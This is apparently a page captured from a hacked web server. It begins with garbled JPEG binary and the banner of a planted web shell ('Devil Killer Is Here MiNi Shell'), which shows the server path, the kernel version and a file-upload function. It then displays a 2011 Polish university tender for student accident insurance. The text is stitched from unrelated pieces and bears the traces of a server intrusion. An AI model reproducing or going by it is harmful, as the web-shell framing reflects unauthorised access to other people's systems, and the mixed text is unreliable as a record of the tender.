JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110602/155257-N-2011.html

<p class="kh_header"><b>Lublin: Usługa ubezpieczenia następstw nieszczęśliwych wypadków (NNW) studentów Katolickiego Uniwersytetu Lubelskiego Jana Pawła II w okresie od 01.10.2011 r. do 30.09.2013 r</b><br>
<b>Numer ogłoszenia: 155257 - 2011; data zamieszczenia: 02.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Katolicki Uniwersytet Lubelski Jana Pawła II , Al. Racławickie 14, 20-950 Lublin, woj. lubelskie, tel. 81 4454159, faks 81 4454163.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kul.lublin.pl/admin/dzp/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Uczelnia prywatna na prawach uczelni publicznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa ubezpieczenia następstw nieszczęśliwych wypadków (NNW) studentów Katolickiego Uniwersytetu Lubelskiego Jana Pawła II w okresie od 01.10.2011 r. do 30.09.2013 r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa ubezpieczenia następstw nieszczęśliwych wypadków studentów Katolickiego Uniwersytetu Lubelskiego Jana Pawła II w Lublinie. 
Przedmiotem ubezpieczenia są następstwa nieszczęśliwych wypadków doznanych przez ubezpieczonego na terytorium Rzeczypospolitej oraz za granicą
a) Definicje 
Za nieszczęśliwy wypadek uważa się: 
nagłe zdarzenie wywołane przyczyną zewnętrzną w wyniku którego ubezpieczony - niezależnie od swojej woli - doznał uszkodzenia ciała, rozstroju zdrowia lub zmarł.
za wyczynowe uprawianie sportu uważa się: 
- uprawianie dyscyplin sportowych w ramach sekcji lub klubów sportowych, polegające na regularnym uczestniczeniu w treningach i zawodach sportowych, jak również uprawianie dyscyplin sportowych w celach zarobkowych oraz 
- uczestniczenie w wyprawach do miejsc charakteryzujących się ekstremalnymi warunkami klimatycznymi lub przyrodniczymi albo w ekspedycjach
za ekspedycję uważa się: zorganizowaną wyprawę mającą na celu zrealizowanie zadań o charakterze sportowym.
za koszty leczenia uważa się: niezbędne z medycznego punktu widzenia koszty poniesione na badania i zabiegi ambulatoryjne oraz operacyjne, pobyt w placówce służby zdrowia, jak również zakup niezbędnych lekarstw i środków opatrunkowych. 
b) Klasa ryzyka wszyscy studenci zostają zakwalifikowani do tzw. I klasy ryzyka (najniższa).
Wydziały i kierunki naukowe Uniwersytetu 
Uniwersytet prowadzi działalność statutową dydaktyczno - naukową na 6 wydziałach w Lublinie, 3 wydziałach zamiejscowych i międzywydziałowym kolegium:
- Teologii
- Prawa, Prawa Kanonicznego i Administracji 
- Filozofii
- Nauk Humanistycznych
- Nauk Społecznych
- Matematyczno-Przyrodniczy oraz 
- Kolegium Międzywydziałowych Indywidualnych Studiów Humanistycznych 
Wydziały Zamiejscowe:
- Nauk Prawnych i Ekonomicznych w Tomaszowie Lubelskim
- Nauk o Społeczeństwie w Stalowej Woli
- Prawa i Nauk o Gospodarce w Stalowej Woli
Łącznie na studiach dziennych, zaocznych, wieczorowych, doktoranckich i podyplomowych na Katolickim Uniwersytecie Lubelskim studiuje ok. 11 000 studentów (w tym ok. 10 100 dziennych i 900 pozostałych) ostateczna liczba studentów na rok akademicki 2011-2012 zostanie ustalona we wrześniu 2011 r. przed rozpoczęciem roku akademickiego. Zanotowano uczestnictwo w ubezpieczeniu studentów w roku akademickim 2010-2011 w liczbie około 11 000 osób.

Charakter działalności pod względem ryzyka ubezpieczeniowego: 
W ramach działalności dydaktyczno - naukowej prowadzone są w większości zajęcia o niskim stopniu ryzyka ubezpieczeniowego. Do zajęć o średnim i większym stopniu ryzyka można zaliczyć zajęcia wychowania fizycznego (w tym zajęcia na basenie), doświadczenia i eksperymenty z fizyki i chemii, grupowe wyjazdy na zajęcia terenowe, praktyki, zajęcia w Klubach i Zespołach studenckich, różnego rodzaju imprezy okolicznościowe i rozrywkowe, mecze ligowe i towarzyskie akademickich drużyn sportowych. Ponadto prowadzone są usługi gastronomiczne (stołówka studencka) i hotelarskie (baza noclegowa akademicka oraz hotele dla studentów zaocznych Uniwersytetu). Zajęcia prowadzone są przez wysoce kwalifikowanych i doświadczonych wykładowców. W zajęciach wychowania fizycznego w roku akademickim bierze udział zmienna ilość studentów, ponieważ uczestnictwo w ww. zajęciach jest dobrowolne; ponadto studenci uprawiają sport w sekcjach sportowych Studium Wychowania Fizycznego i Sportu KUL, oraz innych zajęciach gimnastyczno - sportowych. 

Osoby ubezpieczone 
Studenci studiów: 
- dziennych - obowiązywać będzie umowa grupowa bezimienna,
- pozostałych - zaocznych, wieczorowych, podyplomowych oraz doktoranckich - obowiązywać będzie umowa grupowa imienna. 

Zakres ubezpieczenia
Zakres pełny (jednakowy dla wszystkich studentów studiów dziennych i pozostałych) ubezpieczenia obejmuje ochroną ubezpieczeniową zdarzenia podczas zajęć dydaktycznych, w drodze na i z zajęć oraz w życiu prywatnym. 
Bez konieczności opłacania dodatkowej składki ubezpieczeniem objęci są studenci uprawiający sport:
a) we wszystkich sekcjach sportowych Studium Wychowania Fizycznego i Sportu  KUL, 
b) w uczelnianych sekcjach sportowych oraz pozaakademickich sekcjach w następujących dyscyplinach sportowych: tenis stołowy, wędkarstwo, kulturystyka, bilard, brydż sportowy, golf, szachy, modelarstwo sportowe, kręglarstwo,
c) uczestnicy wypraw i ekspedycji organizowanych przez jednostki Uniwersytetu w szczególności przez uczelniany samorząd, stowarzyszenia i zrzeszenia studenckie Katolickiego Uniwersytetu Lubelskiego Jana Pawła II.
Suma ubezpieczenia  -  nie mniej niż 20 000,-PLN na osobę
Składka ubezpieczeniowa -  Zamawiający ustala składkę roczną od osoby (niezależnie od rodzaju studiów) w wysokości około 45,-PLN  od osoby. 
Świadczenia
W ramach świadczeń podstawowych - (system proporcjonalny wypłaty świadczeń) mają być wypłacane następujące świadczenia:
a) z tytułu trwałego uszczerbku na zdrowiu :
- w przypadku uszczerbku w wysokości 100% - pełną sumę ubezpieczenia określoną w umowie,
- w przypadku uszczerbku częściowego - procent sumy ubezpieczenia odpowiadający procentowi trwałego uszczerbku na zdrowiu,
b) w przypadku śmierci w wyniku nieszczęśliwego wypadku, jeżeli nastąpiła ona w okresie do 2 lat od jego daty - 100% określonej w umowie sumy ubezpieczenia .
W ramach rozszerzenia wprowadza się następujące świadczenia: 
a) zwrot udokumentowanych kosztów leczenia, pod warunkiem że zostały poniesione w okresie nie dłuższym niż 2 lata od daty wypadku - do wysokości 10% sumy ubezpieczenia,
b) zwrot udokumentowanych kosztów nabycia protez oraz specjalnych środków ochronnych i pomocniczych, pod warunkiem że zostały one poniesione w okresie nie dłuższym niż 2 lata od daty wypadku - do wysokości 25% sumy ubezpieczenia,
c) dzienne świadczenie szpitalne, w przypadku pobytu ubezpieczonego w szpitalu na terytorium Rzeczypospolitej w następstwie nieszczęśliwego wypadku objętego ochroną ubezpieczeniową - w wysokości 25,-PLN za każdy dzień pobytu w szpitalu (nie dotyczy pobytu w sanatoriach, szpitalach uzdrowiskowych, ośrodkach rehabilitacyjnych, domach opieki lub hospicjach),
Dodatkowe istotne ustalenia (skutkujące odpowiednimi zapisami w Umowie Generalnej Ubezpieczenia NNW Studentów): 
a) w przypadku studentów studiów dziennych umowa ubezpieczenia ma charakter grupowy - bezimienny (nie ma obowiązku opłacania składki przez 100% studentów studiów dziennych), ochrona ubezpieczeniowa w stosunku do wszystkich studentów studiów dziennych obowiązuje od dnia 01.10.2011 r. do 30.09.2012 r. w pierwszym rocznym okresie ubezpieczeniowym, a następnie od dnia 01.10.2012 r. do 30.09.2013 r. w drugim rocznym okresie ubezpieczeniowym. 
b) w przypadku pozostałych studentów umowa ma charakter imienny, ochrona ubezpieczeniowa obowiązuje od dnia następnego po opłaceniu składki przez danego studenta,
c) ustalanie świadczeń :
- pełny proces obsługi likwidacji szkód włącznie z decyzją dotyczącą akceptacji wypłaty świadczenia odbywa się w Lublinie,
- oceny stopnia trwałego uszczerbku oprócz komisji ubezpieczyciela może dokonywać wybrany przez ubezpieczyciela lekarz zatrudniony w studenckiej przychodni zdrowia lub innej uzgodnionej placówce służby zdrowia.
- dopuszcza się możliwość zawarcia ugody z poszkodowanym bez konieczności orzecznictwa komisji lub wypłaty świadczeń zaliczkowych,
- ubezpieczyciel zobowiązuje się do składania pisemnych kwartalnych raportów z przebiegu wypłaty świadczeń z ubezpieczenia i rezerw na przewidywane wypłaty.
- system opłaty składki: w poszczególnych dwóch rocznych okresach ubezpieczeniowych, dla których wystawiane będą roczne polisy ubezpieczeniowe składka płatna w dwóch ratach odpowiednio: w pierwszym rocznym okresie ubezpieczeniowym (01.10.2011 - 30.09.2012) 1 rata do 31.12.2011 r., 2 rata do 31.01.2012 r.; w drugim rocznym okresie ubezpieczeniowym (01.10.2012 - 30.09.2013) 1 rata do 31.12.2012 r., 2 rata do 31.01.2013 r.
Okres ubezpieczenia - okres obowiązywania Umowy Generalnej Ubezpieczeń NNW od dnia 01.10.2011 r. do 30.09.2013 r.
Wymagania dot. placówki prowadzącej obsługę osób ubezpieczonych 
Wykonawca ma posiadać min. 1 placówkę prowadzącą obsługę likwidacji szkód z ubezpieczeń NNW na terenie miasta Lublin
Powyższe informacje stanowią podstawowe [minimalne] elementy przedmiotu zamówienia. Negocjacjom będą podlegały: Zakres ubezpieczenia, suma ubezpieczenia, składka ubezpieczeniowa, świadczenia, dodatkowe istotne ustalenia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Oprócz zamówienia podstawowego Zamawiający przewiduje udzielenie zamówień uzupełniających na wartość nie większą niż 10% wartości zamówienia podstawowego. Przedmiot zamówień uzupełniających jest tożsamy z przedmiotem zamówienia podstawowego i wynika z potrzeby zapewnienia możliwości przystąpienia do ubezpieczenia większej liczby studentów</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.51.21.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłaty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania spełnią Wykonawcy, którzy wykażą się  posiadaniem zezwolenia Ministerstwa Finansów na prowadzenie działalności ubezpieczeniowej we wszystkich grupach ryzyk objętych przedmiotem niniejszego zamówienia zgodnie z ustawą z dnia 22 maja 2003 r. o działalności ubezpieczeniowej (Dz. U. Nr 124, poz. 1151 ze zm.) 
Warunek zostanie oceniony w oparciu o metodę 0-1 na zasadzie kwalifikacji spełnia-nie spełnia, na podstawie dokumentów i oświadczenia o spełnieniu warunków udziału w postępowaniu sporządzonego wg wzoru stanowiącego załącznik nr 2 do wniosku.  Dokumenty i oświadczenie potwierdzające spełnianie tego warunku zostały wskazane w części III.4 Ogłoszenia o zamówieniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek dot. wiedzy i doświadczenia,  jeśli Wykonawca wykaże się wykonaniem lub wykonywaniem co najmniej 3 usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, tj. usług dot. ubezpieczeń grupowych NNW,  w których liczba osób objętych ubezpieczeniem liczy minimum 1000 osób. Warunek zostanie oceniony w oparciu o metodę 0-1 na zasadzie kwalifikacji spełnia-nie spełnia, na podstawie dokumentów i oświadczenia o spełnieniu warunków udziału w postępowaniu sporządzonego wg wzoru stanowiącego załącznik nr 2 do wniosku. Dokumenty i oświadczenie potwierdzające spełnianie tego warunku zostały wskazane w części III.4 Ogłoszenia o zamówieniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący potencjału technicznego zostanie oceniony w oparciu o metodę 0-1 na zasadzie kwalifikacji spełnia-nie spełnia, na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu sporządzonego wg wzoru przygotowanego przez Zamawiającego</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący osób zdolnych do wykonania zamówienia oceniony w oparciu o metodę 0-1 na zasadzie kwalifikacji spełnia-nie spełnia, na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu sporządzonego wg wzoru stanowiącego załącznik nr 2 do wniosku wskazanego w części III.4 Ogłoszenia o zamówieniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący sytuacji ekonomicznej i finansowej zostanie oceniony w oparciu o metodę 0-1 na zasadzie kwalifikacji spełnia-nie spełnia, na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu sporządzonego wg wzoru stanowiącego załącznik nr 2 do wniosku wskazanego w części III.4 Ogłoszenia o zamówieniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony podpisany formularz wniosku sporządzony wg wzoru stanowiącego załącznik nr 1 do wniosku
2.Ogólne Warunki Ubezpieczenia Następstw Nieszczęśliwych Wypadków (OWU NNW)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> negocjacje z ogłoszeniem.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Zamawiający zaprosi do negocjacji 5 (pięciu) Wykonawców, którzy spełnią warunki udziału w postępowaniu Jeżeli liczba Wykonawców, spełniających warunki udziału w postępowaniu będzie większa niż 5, do negocjacji zostaną zaproszeni Wykonawcy, którzy otrzymają najwyższą ocenę punktową. Kwalifikacja wniosków będzie dokonana w oparciu o 1 kryterium, do którego przypisane zostało znaczenie, określone udziałem procentowym (100%) w ocenie ogólnej. Ogólna ocena wniosku będzie iloczynem punktów uzyskanych za kryterium liczba usług dot. grupowych ubezpieczeń NNW obejmujących ubezpieczeniem grupę minimum 1000 osób oraz wagi procentowej tego kryterium.
Przy kwalifikacji wniosków Zamawiający będzie kierował się następującym kryterium i jego wagą: Liczba usług wykonanych lub w trakcie wykonywania w ciągu ostatnich trzech lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie dot. grupowych ubezpieczeń NNW, w których grupa ubezpieczonych liczy minimum 1000 osób - 100% 
Opis sposobu obliczania wartości punktowej:
Klu=(Oferowana liczba grupowych ubezpieczeń NNW/Najwyższa liczba grupowych ubezpieczeń NNW)*100%*100 punktów.
Wyliczenie punktów zostanie dokonane z dokładnością do dwóch miejsc po przecinku, zgodnie z matematycznymi zasadami zaokrąglania (5 i więcej na trzecim miejscu po przecinku zaokrąglenie w górę , poniżej 5 zaokrąglenie w dół)</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Świadczenia dodatkowe - 20</li>
<li>3 - Sposób i termin likwidacji szkód - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie prawo do dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w przypadku, gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> nie dotyczy<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> nie dotyczy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2011 godzina 11:00, miejsce: Katolicki Uniwersytet Lubelski Jana Pawła II; Al. Racławickie 14, 20 - 950 Lubin; Dział Zamówień i Zaopatrzenia, Collegium Jana Pawła II, pokój nr 228..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> I. Przygotowanie wniosku o dopuszczenie do udziału w postępowaniu. 
1. Wykonawca może złożyć tylko jeden wniosek.
2. Wniosek składa się pod rygorem nieważności, w formie pisemnej.
3. Wniosek składa się pod rygorem nieważności w formie pisemnej, w formie zapewniającej czytelną jej treść. Forma pisemna  w rozumieniu Zamawiającego oznacza sporządzenie wniosku odręcznie długopisem, na maszynie do pisania, na komputerze.
4. Wniosek musi być sporządzony w języku polskim. Jeżeli Wykonawca złoży wraz z wnioskiem dokument sporządzony w języku obcym, ma obowiązek wraz z tym dokumentem złożyć jego tłumaczenie na język polski poświadczone przez osobę lub osoby upoważnione do reprezentowania Wykonawcy.  
5. W celach porządkowych wszystkie zapisane strony we wniosku powinny być ponumerowane i trwale złączone. We Formularzu Wniosku Wykonawca powinien podać ilość zapisanych stron, z których składa się jego wniosek
6. Wszystkie miejsca w których Wykonawca naniósł jakieś zmiany, poprawki, przekreślenia muszą być przez niego parafowane i datowane. Jeśli zmiany nie będą parafowane - Zamawiający nie uwzględni tych zmian (weźmie pod uwagę pierwszy zapis zamieszczony przez Wykonawcę w treści wniosku przed naniesieniem zmian).
7. Dokumenty składające się na wniosek , posiadają opracowane przez Zamawiającego wzory , które zostały zamieszczone na stronie internetowej Zamawiającego pod adresem: http://bip.kul.lublin.pl/zamowienia-publiczne,1650.html i mają być sporządzone zgodnie z tymi wzorami. Należą do nich:
a) Formularz wniosku - Załącznik nr 1
b) Oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 
